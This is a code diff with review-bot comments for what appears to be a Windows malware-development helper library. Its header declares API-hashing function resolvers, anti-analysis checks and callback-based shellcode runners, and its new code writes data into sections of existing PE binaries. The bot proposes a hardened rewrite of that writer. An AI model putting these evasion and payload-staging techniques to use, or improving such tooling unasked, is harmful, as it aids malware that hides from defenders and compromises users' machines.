INT32 HashStringSipHashA(_In_ PCHAR String);
INT32 HashStringSipHashW(_In_ PWCHAR String);
INT32 HashStringMurmurA(_In_ PCHAR String);
INT32 HashStringMurmurW(_In_ PWCHAR String);
BOOL CreateMd5HashFromFilePathW(_In_ PWCHAR FilePath, _Inout_ PWCHAR Md5Hash);
BOOL CreateMd5HashFromFilePathA(_In_ PCHAR FilePath, _Inout_ PCHAR Md5Hash);
DWORD HashStringDjb2A(_In_ LPCSTR String);
DWORD HashStringDjb2W(_In_ LPCWSTR String);
ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String);
ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String);
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ LPCSTR String);
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ LPCWSTR String);
DWORD HashStringLoseLoseA(_In_ LPCSTR String);
DWORD HashStringLoseLoseW(_In_ LPCWSTR String);
INT HashStringRotr32A(_In_ LPCSTR String);
INT HashStringRotr32W(_In_ LPCWSTR String);
DWORD HashStringSdbmA(_In_ LPCSTR String);
DWORD HashStringSdbmW(_In_ LPCWSTR String);
UINT32 HashStringSuperFastHashA(_In_ LPCSTR String);
UINT32 HashStringSuperFastHashW(_In_ LPCWSTR String);
INT HashStringUnknownGenericHash1A(_In_ LPCSTR String);
INT HashStringUnknownGenericHash1W(_In_ LPCWSTR String);
INT32 HashStringSipHashA(_In_ LPCSTR String);
INT32 HashStringSipHashW(_In_ LPCWSTR String);
INT32 HashStringMurmurA(_In_ LPCSTR String);
INT32 HashStringMurmurW(_In_ LPCWSTR String);
BOOL CreateMd5HashFromFilePathW(_In_ LPCWSTR FilePath, _Inout_ PWCHAR Md5Hash);
BOOL CreateMd5HashFromFilePathA(_In_ LPCSTR FilePath, _Inout_ PCHAR Md5Hash);
INT CreatePseudoRandomInteger(_In_ ULONG Seed);
PWCHAR CreatePseudoRandomStringW(_In_ SIZE_T dwLength, _In_ ULONG Seed);
PCHAR CreatePseudoRandomStringA(_In_ SIZE_T dwLength, _In_ ULONG Seed);
BOOL HashFileByMsiFileHashTableW(_In_ PWCHAR Path, _Inout_ PULONG FileHash);
BOOL HashFileByMsiFileHashTableA(_In_ PCHAR Path, _Inout_ PULONG FileHash);
BOOL HashFileByMsiFileHashTableW(_In_ LPCWSTR Path, _Inout_ PULONG FileHash);
BOOL HashFileByMsiFileHashTableA(_In_ LPCSTR Path, _Inout_ PULONG FileHash);
ULONG CreatePseudoRandomIntegerFromNtdll(_In_ ULONG Seed);
@ -126,18 +125,18 @@ PPEB GetPeb(VOID);
PPEB GetPebFromTeb(VOID);
PKUSER_SHARED_DATA GetKUserSharedData(VOID);
PRTL_USER_PROCESS_PARAMETERS GetRtlUserProcessParameters(VOID);
DWORD64 __stdcall GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 __stdcall GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcName);
DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcName);
DWORD64 GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
DWORD64 GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcName);
DWORD64 GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcName);
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
@ -151,10 +150,10 @@ HMODULE ProxyRegisterWaitLoadLibraryA(_In_ LPCSTR lpModuleName);
/*******************************************
HELPER FUNCTIONS
*******************************************/
BOOL IsPathValidA(_In_ PCHAR FilePath);
BOOL IsPathValidW(_In_ PWCHAR FilePath);
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ PCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL IsPathValidA(_In_ LPCSTR FilePath);
BOOL IsPathValidW(_In_ LPCWSTR FilePath);
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ LPCWSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ LPCSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
BOOL GetSystemWindowsDirectoryA(_In_ DWORD nBufferLength, _Inout_ PCHAR lpBuffer);
BOOL GetSystemWindowsDirectoryW(_In_ DWORD nBufferLength, _Inout_ PWCHAR lpBuffer);
BOOL CreateWindowsObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
@ -194,6 +193,13 @@ BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHA
DWORD GetCurrentProcessIdFromOffset(VOID);
HMODULE GetPeFileBaseAddress(VOID);
DWORD64 LdrLoadGetProcedureAddress(VOID);
BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName);
BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName);
BOOL AddSectionToPeFileW(_In_ LPCWSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes);
BOOL AddSectionToPeFileA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes);
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes);
BOOL WriteDataToPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes);
@ -204,8 +210,8 @@ LCID GetCurrentLocaleFromTeb(VOID);
DWORD GetNumberOfLinkedDlls(VOID);
BOOL IsNvidiaGraphicsCardPresentA(VOID);
BOOL IsNvidiaGraphicsCardPresentW(VOID);
BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension);
BOOL IsProcessRunningW(_In_ PWCHAR ProcessNameWithExtension);
BOOL IsProcessRunningA(_In_ LPCSTR ProcessNameWithExtension);
BOOL IsProcessRunningW(_In_ LPCWSTR ProcessNameWithExtension);
BOOL IsProcessRunningAsAdmin(VOID);
ULONG GetOsMajorVersionFromPeb(VOID);
ULONG GetOsMinorVersionFromPeb(VOID);
@ -280,6 +286,17 @@ BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSiz
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, only triggers on certain button presses, prone to crashing
BOOL MpfSceViaImmEnumInputContext(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaCertFindChainInStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Not working?
BOOL MpfSceViaEnumPropsExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaCreateThreadpoolWait(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
BOOL MpfSceViaCryptEnumOIDInfo(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaDSA_EnumCallback(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
/*******************************************
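Review bot: Dropping `__stdcall` from the twelve `GetProcAddress*` prototypes in the `@ -126,18 +125,18 @@` hunk is a calling-convention change on 32-bit builds, not just a tidy-up; the definitions are not in this chunk, so if they or any function-pointer types that receive these addresses still carry `__stdcall`, declaration and definition now disagree and the x86 build will reject it. On x64 there is a single convention and the change is inert, which may be why it went unnoticed. A one-line comment above the group, such as `// calling convention intentionally unspecified; definitions in the matching .cpp files must agree`, would record the decision.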


@ -0,0 +1,122 @@
#include "Win32Helper.h"
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
CHAR DisposeableObject[32] = { 0 };
if (WCharStringToCharString(DisposeableObject, (PWCHAR)SectionName, StringLengthW(SectionName)) == 0)
goto EXIT_ROUTINE;
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileW(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer);
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, DisposeableObject) == ERROR_SUCCESS)
{
if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, NULL, NULL))
goto EXIT_ROUTINE;
}
}
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
BOOL WriteDataToPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
{
BOOL bFlag = FALSE;
HANDLE hHandle = INVALID_HANDLE_VALUE;
LONGLONG SizeOfTargetBinary = 0L;
PBYTE FileBuffer = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
PIMAGE_SECTION_HEADER Section = NULL;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
SizeOfTargetBinary = GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL);
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
goto EXIT_ROUTINE;
hHandle = CreateFileA(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHandle == INVALID_HANDLE_VALUE)
goto EXIT_ROUTINE;
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
if (FileBuffer == NULL)
goto EXIT_ROUTINE;
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
goto EXIT_ROUTINE;
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer);
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, SectionName) == ERROR_SUCCESS)
{
if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
goto EXIT_ROUTINE;
if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, NULL, NULL))
goto EXIT_ROUTINE;
}
}
bFlag = TRUE;
EXIT_ROUTINE:
if (FileBuffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
if (hHandle)
CloseHandle(hHandle);
return bFlag;
}
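Review bot: The write loop in both `WriteDataToPeSectionW` and `WriteDataToPeSectionA` writes `DataToWriteInBytes` at `PointerToRawData` without comparing it to the section's `SizeOfRawData`, so an oversized buffer is written over whatever follows that section in the file; check the size before seeking. The name match also over-reads: `IMAGE_SECTION_HEADER.Name` is 8 bytes with no terminator when all eight are used, and `StringCompareA` runs on into the next field — compare through a NUL-terminated copy and bound the requested name (which also protects the 32-byte `DisposeableObject` in the W variant). Two smaller points in the same functions: `hHandle` starts as `INVALID_HANDLE_VALUE`, so `if (hHandle) CloseHandle(hHandle);` closes that sentinel on every early exit, and `ReadFile`/`WriteFile` are called with both `lpNumberOfBytesRead` and `lpOverlapped` NULL, which the API permits only when an OVERLAPPED is supplied. `RtlLoadPeHeaders`'s result is ignored, so a non-PE input reaches `File->NumberOfSections` through a NULL pointer, and `HeapFree` is passed `HEAP_ZERO_MEMORY`, which is not a HeapFree flag. The rewritten W body is below; the A variant needs the same changes minus the wide-to-narrow conversion.
```cpp
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
{
	// … unchanged: existing locals …
	DWORD dwBytesTransferred = 0;
	CHAR CurrentSectionName[IMAGE_SIZEOF_SHORT_NAME + 1] = { 0 };

	// a PE section name is at most 8 bytes; this also bounds DisposeableObject below
	if (StringLengthW(SectionName) > IMAGE_SIZEOF_SHORT_NAME)
		goto EXIT_ROUTINE;

	// … unchanged: name conversion, size query, CreateFileW, HeapAlloc …

	// lpNumberOfBytesRead may be NULL only with an OVERLAPPED; also reject a short read
	if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, &dwBytesTransferred, NULL) || dwBytesTransferred != (DWORD)SizeOfTargetBinary)
		goto EXIT_ROUTINE;

	// Nt/File are only valid when the headers parsed
	if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer))
		goto EXIT_ROUTINE;

	SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));

	for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
	{
		// Name is not NUL-terminated when all 8 bytes are used; compare a terminated copy
		CopyMemoryEx(CurrentSectionName, SectionHeaderArray[dwX].Name, IMAGE_SIZEOF_SHORT_NAME);
		if (StringCompareA(CurrentSectionName, DisposeableObject) != ERROR_SUCCESS)
			continue;

		// never write past the section's raw data into whatever follows it in the file
		if (DataToWriteInBytes > SectionHeaderArray[dwX].SizeOfRawData)
			goto EXIT_ROUTINE;

		if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
			goto EXIT_ROUTINE;

		if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, &dwBytesTransferred, NULL) || dwBytesTransferred != DataToWriteInBytes)
			goto EXIT_ROUTINE;
	}

	bFlag = TRUE;

EXIT_ROUTINE:

	if (FileBuffer)
		HeapFree(GetProcessHeapFromTeb(), 0, FileBuffer);

	// INVALID_HANDLE_VALUE is non-zero, so a plain truthiness test closes the sentinel
	if (hHandle != INVALID_HANDLE_VALUE)
		CloseHandle(hHandle);

	return bFlag;
}
```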